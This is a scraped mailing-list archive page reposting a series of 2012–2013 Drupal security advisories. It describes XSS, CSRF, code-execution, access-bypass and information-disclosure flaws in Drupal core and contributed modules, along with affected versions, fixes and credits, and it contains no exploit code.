drupal.org or via the contact form at http://drupal.org/contact [8]. Learn more about the Drupal Security team and their policies [9], writing secure code for Drupal [10], and securing your site [11]. [1] http://drupal.org/project/keyboard_shortcut [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/keyboard_shortcut [5] http://drupal.org/project/keyboard_shortcut [6] http://drupal.org/user/524484 [7] http://drupal.org/user/383424 [8] http://drupal.org/contact [9] http://drupal.org/security-team [10] http://drupal.org/writing-secure-code [11] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-008 - CurvyCorners - Cross Site Scripting (XSS) - module unsupported
View online: http://drupal.org/node/1896718 * Advisory ID: DRUPAL-SA-CONTRIB-2013-008 * Project: CurvyCorners [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The CurvyCorners module enables you to create rounded corners on HTML block elements. The module doesn't sufficiently filter user entered text when being displayed. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer curvycorners". CVE IDENTIFIER(S) ISSUED * CVE-2013-1393 VERSIONS AFFECTED --- * All CurvyCorners 6.x-1.x versions. * All CurvyCorners 7.x-1.x versions. Drupal core is not affected. If you do not use the contributed CurvyCorners [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the CurvyCorners module, uninstall the module - there is no patch available to fix this issue Also see the CurvyCorners [4] project page. REPORTED BY - * rickauer [5] FIXED BY Not applicable. COORDINATED BY -- * Greg Knaddison [6] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [7]. Learn more about the Drupal Security team and their policies [8], writing secure code for Drupal [9], and securing your site [10]. [1] http://drupal.org/project/curvycorners [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/curvycorners [4] http://drupal.org/project/curvycorners [5] http://drupal.org/user/69553 [6] http://drupal.org/user/36762 [7] http://drupal.org/contact [8] http://drupal.org/security-team [9] http://drupal.org/writing-secure-code [10] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-007 User Relationships - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1896720 * Advisory ID: DRUPAL-SA-CONTRIB-2013-007 * Project: User Relationships [1] (third-party module) * Version: 6.x, 7.x * Date: 2013-January-23 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - The User Relationships module allows you to create multiple relationship types and maintain relationships between users in your Drupal site. The module does not sufficiently escape relationship names before display. This allows users with the correct permissions to create relationship names containing arbitrary Javascript which will then be executed by the browser. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer user relationships". CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * User Relationships 6.x-1.x versions prior to 6.x-1.4 * User Relationships 7.x-1.x versions prior to 7.x-1.0-alpha5 Drupal core is not affected. If you do not use the contributed User Relationships [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the User Relationships module for Drupal 6.x, upgrade to User Relationships 6.x-1.4 [5] * If you use the User Relationships module for Drupal 7.x, upgrade to User Relationships 7.x-1.0-alpha5 [6] Also see the User Relationships [7] project page. REPORTED BY - * Klaus Purer [8] of the Drupal Security Team FIXED BY * Mark Ferree [9] the module maintainer COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/user_relationships [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/user_relationships [5] http://drupal.org/node/1896272 [6] http://drupal.org/node/1896276 [7] http://drupal.org/project/user_relationships [8] http://drupal.org/user/262198 [9] http://drupal.org/user/76245 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-006 - Video - Arbitrary Code Execution
View online: http://drupal.org/node/1896714 * Advisory ID: DRUPAL-SA-CONTRIB-2013-006 * Project: Video [1] (third-party module) * Version: 7.x * Date: 2013-January-23 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Arbitrary PHP code execution DESCRIPTION - The video module enables you to upload video and audio files and transcode them into other formats and sizes using other tools like FFmpeg or Zencoder. The module saves information about the FFmpeg executable in a temporary PHP file, but doesn't check if the file has been tampered with when reading the file, allowing any PHP code in that file to be executed. This vulnerability is mitigated by the fact that an attacker must have write access to the temporary PHP file (something which is not known to be possible via the module itself). Sites not using the FFmpeg transcoder are only vulnerable if the attacker has the 'administer site configuration' permission in order to change the transcoder to FFmpeg. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Video 7.x-2.x versions prior to 7.x-2.9. Drupal core is not affected. If you do not use the contributed Video [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Video module for Drupal 7.x, upgrade to Video 7.x-2.9 [5] Also see the Video [6] project page. REPORTED BY - * Joris van Eijden [7] of the Drupal Security Team FIXED BY * Jorrit Schippers [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/video [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/video [5] http://drupal.org/node/1895234 [6] http://drupal.org/project/video [7] http://drupal.org/user/892998 [8] http://drupal.org/user/161217 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CORE-2013-001 - Drupal core - Multiple vulnerabilities
reached at security at drupal.org or via the contact form at http://drupal.org/contact [34]. Learn more about the Drupal Security team and their policies [35], writing secure code for Drupal [36], and securing your site [37]. [1] http://drupal.org/project/drupal [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/drupal-6.28-release-notes [5] http://drupal.org/drupal-7.19-release-notes [6] http://drupal.org/project/drupal [7] http://drupal.org/user/124982 [8] http://drupal.org/user/1924632 [9] http://drupal.org/user/1605796 [10] http://drupal.org/user/204187 [11] http://drupal.org/user/855656 [12] http://drupal.org/user/245825 [13] http://drupal.org/user/598310 [14] http://drupal.org/user/172987 [15] http://drupal.org/user/264148 [16] http://drupal.org/user/748566 [17] http://drupal.org/user/96647 [18] http://drupal.org/user/36762 [19] http://drupal.org/user/124982 [20] http://drupal.org/user/22211 [21] http://drupal.org/user/1924632 [22] http://drupal.org/user/426416 [23] http://drupal.org/user/124982 [24] http://drupal.org/user/49851 [25] http://drupal.org/user/17943 [26] http://drupal.org/user/855656 [27] http://drupal.org/user/124982 [28] http://drupal.org/user/4166 [29] http://drupal.org/user/52142 [30] http://drupal.org/user/36762 [31] http://drupal.org/user/17943 [32] http://drupal.org/user/49851 [33] http://drupal.org/user/148199 [34] http://drupal.org/contact [35] http://drupal.org/security-team [36] http://drupal.org/writing-secure-code [37] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-005 - Mark Complete Module - Cross Site Request Forgery (CSRF)
View online: http://drupal.org/node/1890538 * Advisory ID: DRUPAL-SA-CONTRIB-2013-005 * Project: Mark Complete [1] (third-party module) * Version: 7.x * Date: 2013-January-16 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables you to update a date field on a node via an AJAX link on the node view page. The module doesn't sufficiently guard against Cross Site Request Forgery (CSRF). CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Mark Complete 7.x-1.x versions prior to 7.x-1.1. Drupal core is not affected. If you do not use the contributed Mark Complete [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Mark Complete module for Drupal 7.x, upgrade to Mark Complete 7.x-1.1 [5] Also see the Mark Complete [6] project page. REPORTED BY - * Lee Rowlands [7] of the Drupal Security Team FIXED BY * Leighton Whiting [8] the module maintainer * Lee Rowlands [9] of the Drupal Security Team * Fox [10] of the Drupal Security Team COORDINATED BY -- * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/mark_complete [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/mark_complete [5] http://drupal.org/node/1890566 [6] http://drupal.org/project/mark_complete [7] http://drupal.org/user/395439 [8] http://drupal.org/user/307704 [9] http://drupal.org/user/395439 [10] http://drupal.org/user/426416 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-003 - RESTful Web Services - Cross site request forgery (CSRF)
View online: http://drupal.org/node/1890222 * Advisory ID: DRUPAL-SA-CONTRIB-2013-003 * Project: RESTful Web Services [1] (third-party module) * Version: 7.x * Date: 2013-January-16 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery DESCRIPTION - This module enables you to expose Drupal entities as RESTful web services. It provides a machine-readable interface to exchange resources in JSON, XML and RDF. The module doesn't sufficiently verify POST requests thereby exposing a Cross Site Request Forgery vulnerability. This vulnerability is mitigated by the fact that an attacker must trick an authenticated user onto a prepared page that leverages a weakness in certain browser plugins. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * RESTWS 7.x-1.x versions prior to 7.x-1.2. * RESTWS 7.x-2.x versions prior to 7.x-2.0-alpha4. Drupal core is not affected. If you do not use the contributed RESTful Web Services [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the RESTWS 1.x module for Drupal 7.x, upgrade to RESTWS 7.x-1.2 [5] * If you use the RESTWS 2.x module for Drupal 7.x, upgrade to RESTWS 7.x-2.0-alpha4 [6] Also see the RESTful Web Services [7] project page. REPORTED BY - * Fredrik Lassen [8] * Klaus Purer [9] of the Drupal Security Team FIXED BY * Klaus Purer [10] the module maintainer COORDINATED BY -- * Klaus Purer [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/restws [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/restws [5] http://drupal.org/node/1890212 [6] http://drupal.org/node/1890216 [7] http://drupal.org/project/restws [8] http://drupal.org/user/243377 [9] http://drupal.org/user/262198 [10] http://drupal.org/user/262198 [11] http://drupal.org/user/262198 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-004 - Live CSS - Arbitrary Code Execution
View online: http://drupal.org/node/1890318 * Advisory ID: DRUPAL-SA-CONTRIB-2013-004 * Project: Live CSS [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-January-16 * Security risk: Highly critical [2] * Exploitable from: Remote * Vulnerability: Arbitrary PHP code execution DESCRIPTION - This module enables you to save CSS and LESS files on the server via your browser. The module doesn't check that the file being saved isn't a script or executable. This vulnerability is mitigated by the fact that an attacker must have a role with the permission "administer CSS". CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Live CSS 6.x-2.x versions prior to 6.x-2.1 [4]. * Live CSS 7.x-2.x versions prior to 7.x-2.7 [5]. Drupal core is not affected. If you do not use the contributed Live CSS [6] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Live CSS module for Drupal 6.x, upgrade to 6.x-2.1 [7]. * If you use the Live CSS module for Drupal 7.x, upgrade to 7.x-2.7 [8]. Also see the Live CSS [9] project page. REPORTED BY - * Ryan Garrett [10] FIXED BY * Guy Bedford [11] the module maintainer COORDINATED BY -- * Greg Knaddison [12] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [13]. Learn more about the Drupal Security team and their policies [14], writing secure code for Drupal [15], and securing your site [16]. [1] http://drupal.org/project/live_css [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/node/1883978 [5] http://drupal.org/node/1883976 [6] http://drupal.org/project/live_css [7] http://drupal.org/node/1883978 [8] http://drupal.org/node/1883976 [9] http://drupal.org/project/live_css [10] http://drupal.org/user/2392210 [11] http://drupal.org/user/746802 [12] http://drupal.org/user/27 [13] http://drupal.org/contact [14] http://drupal.org/security-team [15] http://drupal.org/writing-secure-code [16] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-002 - Payment - Access Bypass
View online: http://drupal.org/node/1884360 * Advisory ID: DRUPAL-SA-CONTRIB-2013-002 * Project: Payment [1] (third-party module) * Version: 7.x * Date: 2013-January-09 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Payment enables other modules to make payments using a variety of payment processing services. The module incorrectly grants access when checking if a user can view payments, allowing a user to access the payments of other users. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Payment 7.x-1.x versions prior to 7.x-1.3. Drupal core is not affected. If you do not use the contributed Payment [4] module, there is nothing you need to do. SOLUTION Update to Payment 7.x-1.3 [5] or later. Also see the Payment [6] project page. REPORTED BY - * Dario Emmanuel Godoy Rojas [7] FIXED BY * Bart Feenstra [8] (the module maintainer) COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [10]. Learn more about the Drupal Security team and their policies [11], writing secure code for Drupal [12], and securing your site [13]. [1] http://drupal.org/project/payment [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/payment [5] http://drupal.org/node/1883830 [6] http://drupal.org/project/payment [7] http://drupal.org/user/186754 [8] http://drupal.org/user/62965 [9] http://drupal.org/user/36762 [10] http://drupal.org/contact [11] http://drupal.org/security-team [12] http://drupal.org/writing-secure-code [13] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-001 - Search API - Cross Site Scripting
View online: http://drupal.org/node/1884332 * Advisory ID: DRUPAL-SA-CONTRIB-2013-001 * Project: Search API [1] (third-party module) * Version: 7.x * Date: 2013-January-09 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - This module enables you to build searches using a wide range of features, data sources and backends. The module doesn't sufficiently sanitize user input when displaying errors in a view with certain backends, including the database backend. This enables attackers to create a Reflected Cross Site Scripting attack by manipulating the URL. This is mitigated by the fact that the vulnerability only occurs with some backends (the Solr backend, e.g., is safe) and for certain common configurations of facets. The module also doesn't sufficiently sanitize output field names in the admin view. This is mitigated by the fact that an attacker would have to have the necessary permissions to change the field names of an indexed entity type. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Search API 7.x-1.x versions prior to 7.x-1.4. Drupal core is not affected. If you do not use the contributed Search API [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Search API module for Drupal 7.x, upgrade to Search API 7.x-1.4 [5] Also see the Search API [6] project page. REPORTED BY - * XSS in Views error messages was reported by Josh Stroschein [7]. * XSS in field names was reported by Francisco José Cruz Romanos [8]. FIXED BY * XSS in Views error messages was fixed by Lee Rowlands [9] of the Drupal Security Team and Bojan Živanović [10]. * XSS in field names was fixed by Francisco José Cruz Romanos [11]. COORDINATED BY -- * Lee Rowlands [12] of the Drupal Security Team * Greg Knaddison [13] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [14]. Learn more about the Drupal Security team and their policies [15], writing secure code for Drupal [16], and securing your site [17]. [1] http://drupal.org/project/search_api [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/search_api [5] http://drupal.org/node/1884076 [6] http://drupal.org/project/search_api [7] http://drupal.org/user/2198458 [8] http://drupal.org/user/848238 [9] http://drupal.org/user/395439 [10] http://drupal.org/user/86106 [11] http://drupal.org/user/848238 [12] http://drupal.org/user/395439 [13] http://drupal.org/user/36762 [14] http://drupal.org/contact [15] http://drupal.org/security-team [16] http://drupal.org/writing-secure-code [17] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-174 - Context - Information Disclosure
View online: http://drupal.org/node/1870550 * Advisory ID: DRUPAL-SA-CONTRIB-2012-174 * Project: Context [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-12-19 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - Context has functionality that renders block content for use with its inline editor. When these requests are made the context module does not sufficiently ensure that users have access to the block. A malicious user could send a specially crafted request and get access to block content they should not be able to see. This vulnerability is mitigated by the fact that an attacker must know the identifiers for the block containing sensitive information and that the block's code must render that sensitive information when requested by a user without privileges to see this information. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Context 6.x-3.x versions prior to 6.x-3.1. * Context 7.x-3.x versions prior to 7.x-3.0-beta6. Drupal core is not affected. If you do not use the contributed Context [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Context module for Drupal 6.x, upgrade to Context 6.x-3.1 [5] * If you use the Context module for Drupal 7.x, upgrade to Context 7.x-3.0-beta6 [6] Also see the Context [7] project page. REPORTED BY - * Fox (hefox) [8] of the Drupal Security Team FIXED BY * Fox (hefox) [9] the module maintainer * tekante [10] the module maintainer COORDINATED BY -- * Fox (hefox) [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/context [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/context [5] http://drupal.org/node/1870518 [6] http://drupal.org/node/1869910 [7] http://drupal.org/project/context [8] http://drupal.org/user/426416 [9] http://drupal.org/user/426416 [10] http://drupal.org/user/640024 [11] http://drupal.org/user/426416 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CORE-2012-004 - Drupal core - Multiple vulnerabilities
ecure code for Drupal [33], and securing your site [34]. [1] http://drupal.org/project/drupal [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/node/1004778 [4] http://drupal.org/node/65409 [5] http://drupal.org/node/1543392 [6] http://cve.mitre.org/ [7] http://drupal.org/drupal-6.27-release-notes [8] http://drupal.org/drupal-7.18-release-notes [9] http://drupal.org/project/drupal [10] http://drupal.org/user/46549 [11] http://drupal.org/user/151544 [12] http://drupal.org/user/22211 [13] http://drupal.org/user/181407 [14] http://drupal.org/user/46549 [15] http://drupal.org/user/383424 [16] http://drupal.org/user/49851 [17] http://drupal.org/user/124982 [18] http://drupal.org/user/400288 [19] http://drupal.org/user/426416 [20] http://drupal.org/user/124982 [21] http://drupal.org/user/35821 [22] http://drupal.org/user/302225 [23] http://drupal.org/user/58170 [24] http://drupal.org/user/36762 [25] http://drupal.org/user/148199 [26] http://drupal.org/user/91990 [27] http://drupal.org/user/124982 [28] http://drupal.org/user/4166 [29] http://drupal.org/user/36762 [30] http://drupal.org/user/426416 [31] http://drupal.org/contact [32] http://drupal.org/security-team [33] http://drupal.org/writing-secure-code [34] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-173 - Nodewords: Information disclosure
View online: http://drupal.org/node/1859282 * Advisory ID: DRUPAL-SA-CONTRIB-2012-173 * Project: Nodewords: D6 Meta Tags [1] (third-party module) * Version: 6.x * Date: 2012-December-05 * Security risk: Not critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module enables you to assign meta tags on Drupal 6 sites to aid with 3rd party search indexing and sharing on social networks. The module doesn't correctly filter node content when configured to automatically generate descriptions meta tags from the node text. This lack of filtering could allow some code, e.g. BBCode, to pass through unprocessed and potentially display private or otherwise secret information, links, file paths or other potentially sensitive details. The problem affects the normal 'description' meta tag along with the 'dc.description' and 'og:description' meta tags, all of which used the same logic. This vulnerability is mitigated by the fact that it is unlikely that sensitive content would be within the extracted portion. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Nodewords 6.x-1.x versions prior to 6.x-1.14. Drupal core is not affected. If you do not use the contributed Nodewords: D6 Meta Tags [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Nodewords module for Drupal 6.x, upgrade to Nodewords 6.x-1.14 [5]. Also see the Nodewords: D6 Meta Tags [6] project page. REPORTED BY - * Andrey Tretyakov [7] * asb [8] FIXED BY * Damien McKenna [9] the module maintainer. COORDINATED BY -- * Chris Hales [10] of the Drupal Security Team * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/nodewords [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/nodewords [5] http://drupal.org/node/1859208 [6] http://drupal.org/project/nodewords [7] http://drupal.org/user/169459 [8] http://drupal.org/user/37833 [9] http://drupal.org/user/108450 [10] http://drupal.org/user/347249 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-172 - Zero Point - Cross Site Scripting (XSS)
View online: http://drupal.org/node/1853376 * Advisory ID: DRUPAL-SA-CONTRIB-2012-172 * Project: Zero Point [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-November-28 * Security risk: Critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Scripting DESCRIPTION - Zero Point is an advanced theme which includes many options, ideal for a wide range of sites. The theme does not escape path aliases exposing a Cross site scripting (XSS) vulnerability in URLs. There are no mitigating factors. CVE: Requested VERSIONS AFFECTED --- * zeropoint 6.x-1.x versions prior to 6.x-1.18 * zeropoint 7.x-1.x versions prior to 7.x-1.4 Drupal core is not affected. If you do not use the contributed Zero Point [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Zero Point theme for Drupal 6.x, upgrade to zeropoint 6.x-1.18 [4] * If you use the Zero Point theme for Drupal 7.x, upgrade to zeropoint 7.x-1.4 [5] Also see the Zero Point [6] project page. REPORTED BY - * samatha [7] FIXED BY * Florian Radut [8] the module maintainer * Christian López Espínola [9] COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/zeropoint [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/zeropoint [4] http://drupal.org/node/1853358 [5] http://drupal.org/node/1853350 [6] http://drupal.org/project/zeropoint [7] http://drupal.org/user/534190 [8] http://drupal.org/user/35316 [9] http://drupal.org/user/959536 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2012-168 - Services - Information Disclosure
View online: http://drupal.org/node/1853200 * Advisory ID: DRUPAL-SA-CONTRIB-2012-168 * Project: Services [1] (third-party module) * Version: 6.x, 7.x * Date: 2012-11-28 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Information Disclosure DESCRIPTION - This module enables you to access content from a remote client. The module doesn't sufficiently adhere to standard Drupal permissions and exposes users emails via the user index method. This vulnerability is mitigated by the fact that an attacker most know the path to the user resource and must be able to access user profiles (have 'access user profiles' permission). CVE: Requested VERSIONS AFFECTED --- * Services 6.x-3.x versions prior to 6.x-3.3. * Services 7.x-3.x versions prior to 7.x-3.3. Drupal core is not affected. If you do not use the contributed Services [3] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Services module for Drupal 6.x, upgrade to Services 6.x-3.3 [4] * If you use the Services module for Drupal 7.x, upgrade to Services 7.x-3.3 [5] Also see the Services [6] project page. REPORTED BY - * Fox (hefox) [7] of the Drupal Security Team FIXED BY * Fox (hefox) [8] of the Drupal Security Team * Kyle Browning [9] the module maintainer COORDINATED BY -- * Fox (hefox) [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/services [2] http://drupal.org/security-team/risk-levels [3] http://drupal.org/project/services [4] http://drupal.org/node/1842026 [5] http://drupal.org/node/1842022 [6] http://drupal.org/project/services [7] http://drupal.org/user/426416 [8] 